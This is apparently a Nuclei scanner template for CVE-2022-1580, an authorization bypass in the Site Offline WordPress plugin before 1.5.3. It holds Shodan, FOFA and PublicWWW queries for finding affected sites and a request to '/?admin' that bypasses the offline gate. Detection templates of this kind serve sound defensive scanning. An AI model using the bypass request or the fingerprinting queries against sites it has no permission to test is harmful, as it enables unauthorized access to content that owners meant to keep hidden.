id: CVE-2022-1580 info: name: Site Offline WP Plugin < 1.5.3 - Authorization Bypass author: Kazgangap severity: medium description: | The plugin prevents users from accessing a website but does not do so if the URL contained certain keywords. Adding those keywords to the URL's query string would bypass the plugin's main feature. remediation: Fixed in 1.5.3 reference: - https://wpscan.com/vulnerability/7b6f91cd-5a00-49ca-93ff-db7220d2630a/ - https://nvd.nist.gov/vuln/detail/CVE-2022-1580 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N cvss-score: 4.3 cve-id: CVE-2022-1580 cwe-id: CWE-639 epss-score: 0.00069 epss-percentile: 0.29862 cpe: cpe:2.3:a:freehtmldesigns:site_offline:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 2 vendor: freehtmldesigns product: "site_offline" framework: wordpress publicwww-query: "/wp-content/plugins/site-offline/" shodan-query: http.html:/wp-content/plugins/site-offline/ fofa-query: body=/wp-content/plugins/site-offline/ tags: cve,cve2022,wpscan,site-offline,wordpress,wp-plugin,wp,freehtmldesigns flow: http(1) && http(2) http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/site-offline/readme.txt" matchers: - type: word internal: true words: - 'Site Offline Or Coming Soon Or Maintenance Mode' - method: GET path: - "{{BaseURL}}/?admin" matchers: - type: dsl dsl: - 'contains_all(body, "wp-block", "author")' - 'status_code == 200' condition: and # digest: 4a0a004730450220072d1ea8c6583e0d3fe84dc24f784423c21251e8eba6b1c28c9c98bf9362dcf40221009c36b590c9d4e5e4eba214c446cdac5ff2a7e0475283468004e64a314476be8f:922c64590222798bb761d5b6d8e72950